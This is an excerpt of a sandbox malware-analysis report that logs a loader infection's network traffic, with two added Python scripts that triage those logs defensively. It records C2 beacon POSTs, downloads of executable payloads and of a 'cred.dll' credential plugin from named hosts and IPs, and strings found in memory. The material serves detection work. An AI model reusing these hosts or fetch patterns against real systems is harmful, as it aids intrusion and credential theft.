                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yxorycdxma.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 209Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tcqdnx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: host-data-coin-11.com
                          Source: global trafficTCP traffic: 192.168.2.4:49806 -> 185.7.214.171:8080
                          Source: global trafficTCP traffic: 192.168.2.4:49901 -> 86.107.197.138:38133
                          Source: unknownNetwork traffic detected: IP country count 10
                          Source: global trafficTCP traffic: 192.168.2.4:49849 -> 104.47.54.36:25
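The request lines above show two distinct behaviours. The bulk of them are POST / to host-data-coin-11.com with an IE11 (Trident/7.0) User-Agent, a form-urlencoded body of a few hundred bytes and a different made-up .com/.net/.org Referer on every request, which is the fake-Referer beaconing SmokeLoader is known for; the rest are GET requests for .exe payloads from data-host-coin-8.com, privacy-tools-for-you-780.com and unicupload.top, and for endpoints on bare IP addresses (185.7.214.171:8080, 81.163.30.181). The following is an added example and not part of the Joe Sandbox report: it parses seven of the report's lines, rebuilt from their values in the run-together form they have here, and turns those observations into triage findings. The header-name splitter, the three-request threshold and the finding labels are this example's choices, not anything the report defines.

```python
"""Triage the run-together 'HTTP traffic detected' lines of this report.

Added example, not part of the Joe Sandbox report.  SAMPLE rebuilds seven of the
report's lines from their values (the 200 OK body is cut after its first bytes);
the header splitter, MIN_BEACONS and the labels are this example's choices."""
import re
from collections import defaultdict
from urllib.parse import urlparse

IE11_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
MIN_BEACONS = 3   # POSTs to one host before we call it a beacon (this example's threshold)

SAMPLE = [
    "Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 11:30:25 GMT"
    "Server: Apache/2.4.38 (Win32) PHP/7.1.26Last-Modified: Fri, 14 Jan 2022 10:54:23 GMT"
    'ETag: "246ec0-5d588a02be749"Accept-Ranges: bytesContent-Length: 2387648'
    "Content-Type: application/x-msdownloadData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67",
    *(f"Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-Alive"
      f"Content-Type: application/x-www-form-urlencodedAccept: */*Referer: {ref}"
      f"User-Agent: {IE11_UA}Content-Length: {n}Host: host-data-coin-11.com"
      for ref, n in [("http://rrooukv.org/", 361), ("http://rxyqqf.net/", 317),
                     ("http://dutgomfkc.net/", 215), ("http://qwfulsm.net/", 358)]),
    "Source: global trafficHTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1"
    f"Connection: Keep-AliveUser-Agent: {IE11_UA}Host: data-host-coin-8.com",
    "Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-Alive"
    f"User-Agent: {IE11_UA}Host: 185.7.214.171:8080",
]

# The report glues header lines together; split in front of the header names it uses.
HEADER_SPLIT = re.compile(
    r"(?=(?:Connection|Content-Type|Content-Length|Accept|Accept-Ranges|Referer|User-Agent"
    r"|Host|Date|Server|Last-Modified|ETag|Data Raw): )")
REQ_LINE = re.compile(r"^(GET|POST) (\S+) HTTP/1\.[01]$")
RESP_LINE = re.compile(r"^HTTP/1\.[01] (\d{3})")
IP_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")


def parse_line(line: str) -> dict:
    """Split one report line into its request/status line and a header dict."""
    body = line.split("HTTP traffic detected: ", 1)[-1]
    first, *rest = HEADER_SPLIT.split(body)
    headers = {}
    for item in rest:
        name, _, value = item.partition(": ")
        headers[name] = value.strip()
    rec = {"headers": headers}
    m = REQ_LINE.match(first.strip())
    if m:
        rec.update(kind="request", method=m.group(1), path=m.group(2))
    else:
        m = RESP_LINE.match(first.strip())
        rec.update(kind="response", status=int(m.group(1)) if m else None)
    return rec


def registrable(host: str) -> str:
    """Last two labels of a hostname; enough for the .com/.net/.org referers seen here."""
    return ".".join(host.lower().split(".")[-2:])


def triage(lines, min_beacons: int = MIN_BEACONS) -> list:
    """Return (label, detail) findings for PE downloads, payload fetches and C2 beacons."""
    findings, posts = [], defaultdict(list)
    for rec in map(parse_line, lines):
        h = rec["headers"]
        if rec["kind"] == "response":
            # Content-Type says executable, or the body starts with the MZ signature.
            if h.get("Content-Type") == "application/x-msdownload" or h.get("Data Raw", "").startswith("4d 5a"):
                findings.append(("pe_download",
                                 f"{rec['status']} response delivers a PE, {h.get('Content-Length', '?')} bytes"))
            continue
        host = h.get("Host", "")
        if rec["method"] == "GET" and (rec["path"].lower().endswith(".exe") or IP_HOST.match(host)):
            findings.append(("payload_fetch", f"GET http://{host}{rec['path']}"))
        elif rec["method"] == "POST" and h.get("Content-Type", "").startswith("application/x-www-form-urlencoded"):
            posts[host].append(rec)
    for host, reqs in posts.items():
        refs = {registrable(urlparse(r["headers"].get("Referer", "")).hostname or "") for r in reqs}
        # Every request carries a Referer that is unique and unrelated to the Host it posts to.
        fake_referers = len(refs) == len(reqs) and all(ref and ref != registrable(host) for ref in refs)
        ie_ua = all("Trident/7.0" in r["headers"].get("User-Agent", "") for r in reqs)
        if len(reqs) >= min_beacons and fake_referers and ie_ua and all(r["path"] == "/" for r in reqs):
            findings.append(("c2_beacon", f"{len(reqs)} POST / to {host}, each with a different fake Referer"))
    return findings


if __name__ == "__main__":
    for label, detail in triage(SAMPLE):
        print(f"{label:14} {detail}")
```

Fed the full list of traffic lines from this report, the same logic would yield one c2_beacon finding for host-data-coin-11.com and one payload_fetch per .exe or bare-IP GET; the TCP lines that follow (port 25 and port 38133) are outside what this HTTP-only triage looks at.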
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/chat/video/videocalldownload.php
                          Source: FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
                          Source: WerFault.exe, 00000011.00000003.800022115.0000000004FB9000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000002.805338567.0000000004FB9000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.819415155.000001A7842EC000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                          Source: FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://forms.rea
                          Source: FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                          Source: FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://go.micros
                          Source: svchost.exe, 00000016.00000003.792006375.000001A784B93000.00000004.00000001.sdmpString found in binary or memory: http://help.disneyplus.com.
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                          Source: unknownDNS traffic detected: queries for: host-data-coin-11.com
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00404BE0 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,InternetConnectA,HttpOpenRequestA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,InternetReadFile,lstrcat,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
                          Source: global traffic | HTTP traffic detected:
                              GET /files/9030_1641816409_7037.exe HTTP/1.1
                              Connection: Keep-Alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: data-host-coin-8.com
                          Source: global traffic | HTTP traffic detected:
                              GET /downloads/toolspab3.exe HTTP/1.1
                              Connection: Keep-Alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: privacy-tools-for-you-780.com
                          Source: global traffic | HTTP traffic detected:
                              GET /install5.exe HTTP/1.1
                              Connection: Keep-Alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: unicupload.top
                          Source: global traffic | HTTP traffic detected:
                              GET /game.exe HTTP/1.1
                              Connection: Keep-Alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: data-host-coin-8.com
                          Source: global traffic | HTTP traffic detected:
                              GET /6.php HTTP/1.1
                              Connection: Keep-Alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: 185.7.214.171:8080
                          Source: global traffic | HTTP traffic detected:
                              GET /files/6961_1642089187_2359.exe HTTP/1.1
                              Connection: Keep-Alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: data-host-coin-8.com
                          Source: global traffic | HTTP traffic detected:
                              GET /files/8474_1641976243_3082.exe HTTP/1.1
                              Connection: Keep-Alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: data-host-coin-8.com
                          Source: global traffic | HTTP traffic detected:
                              GET /files/6961_1642089187_2359.exe HTTP/1.1
                              Connection: Keep-Alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: data-host-coin-8.com
                          Source: global traffic | HTTP traffic detected:
                              GET /d2VxjasuwS/plugins/cred.dll HTTP/1.1
                              Host: 185.215.113.35
                          Source: global traffic | HTTP traffic detected:
                              GET /files/7729_1642101604_1835.exe HTTP/1.1
                              Connection: Keep-Alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: data-host-coin-8.com
                          Source: global traffic | HTTP traffic detected:
                              GET /6236.exe HTTP/1.1
                              Connection: Keep-Alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: 81.163.30.181
                          Source: global traffic | HTTP traffic detected:
                              GET /capibar HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              Content-Type: text/plain; charset=UTF-8
                              Host: 185.163.204.22
                          Source: global traffic | HTTP traffic detected:
                              GET //l/f/S2zKVH4BZ2GIX1a3NFPE/bd39b08a69ef2a6dac4b951657d49c6ecf7db331 HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              Host: 185.163.204.24
                          Source: global traffic | HTTP traffic detected:
                              GET /1.exe HTTP/1.1
                              Host: 81.163.30.181
                              Accept: */*
                          Source: global traffic | HTTP traffic detected:
                              GET /2.exe HTTP/1.1
                              Host: 81.163.30.181
                              Accept: */*
                          Source: global traffic | HTTP traffic detected:
                              GET //l/f/S2zKVH4BZ2GIX1a3NFPE/cae3f8ed633c3e67f112fa91bf9f9a15abbe2944 HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              Host: 185.163.204.24
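The requests listed above share a handful of traits that are easy to key on in proxy or sensor logs: executables and DLLs fetched by name over plain HTTP, Host headers that are bare IP addresses (one on port 8080), the Internet Explorer 11 "Trident/7.0 ... like Gecko" string on every .exe download, and several requests that carry no User-Agent at all. The following triage script is an added example, not part of the sandbox report and not a vendor rule set: the rule names, the heuristics and the one benign control request are this example's own, and the sample requests are reconstructed from the entries above.

```python
import re
from ipaddress import ip_address

# Constructed sample: request headers as the sandbox printed them, one request
# per string, headers separated by CRLF. Reconstructed from the report entries
# above plus one benign request (www.example.com) added as a negative control.
SAMPLE_REQUESTS = [
    "GET /files/9030_1641816409_7037.exe HTTP/1.1\r\nConnection: Keep-Alive\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Host: data-host-coin-8.com",
    "GET /6.php HTTP/1.1\r\nConnection: Keep-Alive\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Host: 185.7.214.171:8080",
    "GET /d2VxjasuwS/plugins/cred.dll HTTP/1.1\r\nHost: 185.215.113.35",
    "GET /capibar HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\n"
    "Pragma: no-cache\r\nContent-Type: text/plain; charset=UTF-8\r\nHost: 185.163.204.22",
    "GET /1.exe HTTP/1.1\r\nHost: 81.163.30.181\r\nAccept: */*",
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/97.0 Safari/537.36",
]

PE_EXT = re.compile(r"\.(exe|dll)$", re.IGNORECASE)


def parse_request(raw):
    """Split a raw request into (method, path, headers dict with lowercase keys)."""
    lines = raw.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip().lower()] = value.strip()
    return method, path, headers


def host_is_bare_ip(host):
    """True when Host is an IPv4 literal (optionally host:port) or a bare IPv6 literal.
    Bracketed IPv6 with a port ([::1]:8080) is not handled by this example."""
    hostname = host.rsplit(":", 1)[0] if host.count(":") == 1 else host
    try:
        ip_address(hostname)
        return True
    except ValueError:
        return False


def host_port(host):
    """Return the explicit port in a Host header, or None when absent."""
    if host.count(":") == 1 and host.rsplit(":", 1)[1].isdigit():
        return int(host.rsplit(":", 1)[1])
    return None


def triage_request(raw):
    """Return the list of reasons a request resembles loader traffic (empty if none).
    Thresholds and labels are this example's heuristics, not a published signature."""
    method, path, headers = parse_request(raw)
    host = headers.get("host", "")
    ua = headers.get("user-agent")
    reasons = []
    if PE_EXT.search(path):
        reasons.append("pe-download")               # .exe/.dll fetched by name over plain HTTP
    if host_is_bare_ip(host):
        reasons.append("bare-ip-host")              # no DNS name in front of the server
    if host_port(host) not in (None, 80):
        reasons.append("non-standard-port")         # e.g. 185.7.214.171:8080 above
    if ua is None:
        reasons.append("no-user-agent")             # WinINet/WinHTTP callers often send none
    elif "Trident/7.0" in ua and "like Gecko" in ua:
        reasons.append("ie11-ua-from-downloader")   # IE11 string reused on every .exe fetch above
    if method == "GET" and headers.get("content-type", "").startswith("text/plain"):
        reasons.append("content-type-on-get")       # a body-less GET declaring a Content-Type
    return reasons


def triage_all(requests):
    """Map each flagged request line to its reasons; clean requests are omitted."""
    flagged = {}
    for raw in requests:
        reasons = triage_request(raw)
        if reasons:
            flagged[raw.split("\r\n")[0]] = reasons
    return flagged


if __name__ == "__main__":
    for request_line, why in triage_all(SAMPLE_REQUESTS).items():
        print(f"{request_line:60s} {', '.join(why)}")
```

None of these traits is malicious on its own (plenty of updaters fetch .exe files from IP-addressed hosts), so the value is in the combination and in the originating process: a request with the IE11 string from a process that is not iexplore.exe, or with no User-Agent at all, deserves a look.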
                          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49810
                          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49876
                          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49853
                          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49886
                          Source: unknown | Network traffic detected: HTTP traffic on port 49891 -> 443
                          Source: unknown | Network traffic detected: HTTP traffic on port 49976 -> 443
                          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49891
                          Source: unknown | Network traffic detected: HTTP traffic on port 49947 -> 443
                          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49791
                          Source: unknown | Network traffic detected: HTTP traffic on port 49878 -> 443
                          Source: unknown | Network traffic detected: HTTP traffic on port 49853 -> 443
                          Source: unknown | Network traffic detected: HTTP traffic on port 49876 -> 443
                          Source: unknown | Network traffic detected: HTTP traffic on port 49810 -> 443
                          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49947
                          Source: unknown | Network traffic detected: HTTP traffic on port 49791 -> 443
                          Source: unknown | Network traffic detected: HTTP traffic on port 49886 -> 443
                          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49878
                          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49976
                          Source: global traffic | HTTP traffic detected:
                              HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Fri, 14 Jan 2022 11:29:11 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Raw: 31 39 0d 0a 14 00 00 00 7b fa f6 18 b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 19{i+,GO0
                          Source: global traffic | HTTP traffic detected:
                              HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Fri, 14 Jan 2022 11:29:12 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic | HTTP traffic detected:
                              HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Fri, 14 Jan 2022 11:29:13 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic | HTTP traffic detected:
                              HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Fri, 14 Jan 2022 11:29:13 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
